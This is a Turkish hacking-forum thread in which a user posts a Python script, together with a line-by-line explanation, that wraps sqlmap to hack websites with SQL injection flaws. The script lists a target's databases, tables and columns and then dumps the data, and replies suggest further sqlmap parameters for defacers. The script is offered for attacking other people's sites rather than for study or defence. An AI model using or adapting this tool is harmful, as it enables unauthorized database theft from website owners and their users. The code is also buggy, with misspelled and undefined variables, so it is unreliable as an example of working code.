Python ile Temel hack programı -WolfCod3r

WolfCod3r

Üye
29 Eki 2018
80
2
127.0.0.1
öncelikle herkese merhaba ben WolfCod3r/Özgür kesinlikle çalıntı değildir tamamen kendim okuyup videolarını izleme bilgim eğer python bilmiyorsanız bile yazabilirsiniz çünkü benim hocam bana pythondan önce pythonla hacker aracı yazmayı öğretti bu şekilde daha rahat anladım öncelikle ilk aracımız sql açıklı siteleri hacklemek için olucaktır zamanla daha fazlasını öğreticem şuan temel düzeydeyiz

lütfen teşekkür edip cevap vermeyi unutmayın istek olduğunu bileyim
GEREKENLER:
python3
ve kali linux veya içinde sqlmap bulunan bir linux fakat linux olmak zorunda
KOMUTLARIMIZ:
#!/usr/bin/env python
import os

os.system("apt-get install figlet")
os.system("clear")
os.system("figlet WolfCod3r~~")
print("""

coder: OZGUR CICEK/WolfCod3r
sql hacker bot by: WolfCod3r
1) sadece acikli linki biliyorum
2) acikli linki ve veri tabani adini biliyorum
3) hem Site hem veri tabani hem tablo adini biliyorum
4) Acikli linki veri tabani adini tablo adini kolon adini biliyorum

""")
islemno = raw_input("islem> ")
if(islemno=="1"):
aciklilink = raw_input("Acikli link girin> ")
os.system("sqlmap -u " + aciklliink + " --dbs --random-agent ")
if(islemno=="2"):
veritabani = raw_input("veritabani adini girin> ")
os.system("sqlmap -u " + aciklilink + " -D" + veritabani + " --tables --random-agent")
if(islemno=="3"):
tablo = raw_input("tablo adini girin> ")
os.system("sqlmap -u " + aciklilink + " -D" + veritabani + " -T " + tablo + " --columns --random-agent")
if(islemno=="4"):
colon = raw_input("colon adi girin> ")
os.system("sqlmap -u " + aciklilink + " -D" + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
else:
print("hatali secim yaptiniz")

şimdi komutları anlatalım import os tarafından başlayalım import dahil etmek demektir os komutunu dahil ettik os.system("") komutu terminal arayüzünde tırnakların arasındaki komutu çalıştırır bu temel düzeyde önemli bir komuttur
os kütüphanesini kullanarak figlet i yükleyerek ekrana WolfCod3r yazdırdım ben siz Sql hacket bot gibi şeyler yazabilirsiniz yalnız türkçe harf vs. kullanmayın
os.system("clear") ilede ekranı temizledik bu arada apt-get install figlet ile ise figleti kurduk :)
daha sonra
print("""

""")

komutu ile ekrana seçeneklerimizi yazdırdık print("") tekli yorum satırı print(""" """) çokklu yorum satırıdır :)

daha sonra veri alma çıktımızın adını islemno yaptık ve raw_input("") komutu ilede kullanıcıdan
veri aldık daha sonra

daha sonra if(islemno=="1"):
komutu ile eğer islemno 1 olursa şunu yap dedik ve : işareti alt satıra inince bir tab kadar boşluk bıraktı ve çalıştırıcağımız komutu tanımladı daha sonra os.system("") komutu ile terminalde çalıştırıcağımız tool u tanımladık yani sqlmap ve site adını raw_input komutuyla veri olarak aldık
daha sonra ise burası çon önemli**
os.system("sqlmap -u " + site " --dbs --random-agent") komutunu pc şöyle algılıcaktır
sqlmap -u siteadı.com/php?id=12 --dbs --random-agent yani + site komutu aldığımız verideki çıktıyı ekler eğer oraya + site yerine + islemno yazsaydık seçtğimiz işlemin nosunu yazıcaktık daha sonrası ise elif komutları oda eğer bu değilse bunu yap anlamına gelir zaten ordaki komutlarında mantığını anlattım

son komutumuz else komutudur mesela else:
print("hatalı secim yaptiniz")
arkadaşlar bu şu anlama gelir mesela biz bu komutu hepsinin altına yazdık 4 tane işlemimiz var
eğer şahış 4 işlem varken 5 yazarsa ona hatalı seçim yazısını verir ve program kapanır eğer bunu islemno 1 in altına yazsaydık 2 diyince hatalı secim yaptiniz dicekti

yazan:
WolfCod3r/Özgür
teşekkür etmeyi unutmayın çok emeğim geçti :D

ayrıca okuduğunuz için çok teşekkür ederim saolun tht ailesi :)

Son düzenleme:

King Kong

Kıdemli Üye
19 Mar 2017
2,392
10
Çöp.Normalde Hayatta Bir Yapılan Programa Bunu Yazmam AmmaVelakin Sadece CMD Kodlarını Ve SQLMap'ı Kullanmışsınız.Ayrıyetten Bu Program Windows ile optimize edilmemiş Yani Bu Programı Windowsta Çalıştırmak İçin Bazı Satırları Silmem Gerekiyor.

Leatrix

Kıdemli Üye
12 Ağu 2018
3,355
10
23
Teşkilat
Eline Fikirlerine Sağlık Ve Düşüncelerine Foruma Hoşgeldin Gelişmen Dileği İle Başarılarının Devamını Dilerim.

WolfCod3r

Üye
29 Eki 2018
80
2
127.0.0.1
Çöp.Normalde Hayatta Bir Yapılan Programa Bunu Yazmam AmmaVelakin Sadece CMD Kodlarını Ve SQLMap'ı Kullanmışsınız.Ayrıyetten Bu Program Windows ile optimize edilmemiş Yani Bu Programı Windowsta Çalıştırmak İçin Bazı Satırları Silmem Gerekiyor.
hocam haklısınız ama işlevsellik bakımından tamamen yazılmış bir program ayrıca temel düzey zaten hocam

15 Eyl 2018
52
0
ABD

if(islemno=="4"):
colon = raw_input("colon adi girin> ")
os.system("sqlmap -u " + aciklilink + " -D" + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")

ah be kardeşim keşke gelip isteseydin ben sana sqlmap parametrelerinden daha fazla verirdim. en azından daha fazla secenek sunmuş olurdu. bu parametreleri yani --random-agent i bilmiyen defacer yok zaten bilmiyenler de havij kullanıyor. tıklayarak yani. bence sen pythondan önce biraz sqlmap parametrelerinin ne işe yaradagını bak. :)
yazdıklarının hepsini herkez biliyor.
birde bir hack toolsu yazdıgında kodları buraya degil github araçılıgıyla paylaşa bilirsin. bu sayadae arkadaşlar orada neler yapıcaklarını ve nasıl indirip kuracaklarını görürler.
iyi forumlar. daha çok çalışman lazım.

Medinelii

Katılımcı Üye
15 Eyl 2018
651
1
MilkyWayGlxy
Formumuza hoş geldin Bir kaç önerim var ;

-Konu yerini doğru seçmen ve kodları
Kod:
 içine alman [/COLOR]

Tekrardan hoş geldin bi yardıma ihtiyacın olursa yardım etmeye çalışırım.İyi Forumlar.

PurposeLess

Katılımcı Üye
14 Kas 2009
786
0
İstanbul
Dostum Merhaba Öncelikle Belirteyim Bu Kodları Yazmanın Hiçbir Mantığı Yok Olan Programları Parametleri Ekleyerek Kendine Göre Editlemişsin. Bunuda Muhtemelen Python Hakkında Pek Bilgiye Sahip Değilsin Bu Kodlarıda Udemy Üzerinden Öğrenmişin Tahminime Göre Battal Koç Hocan Sana Tavsiyem Başka Kurslara Yönelmen O Kursla Vakit Kaybetmemen.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.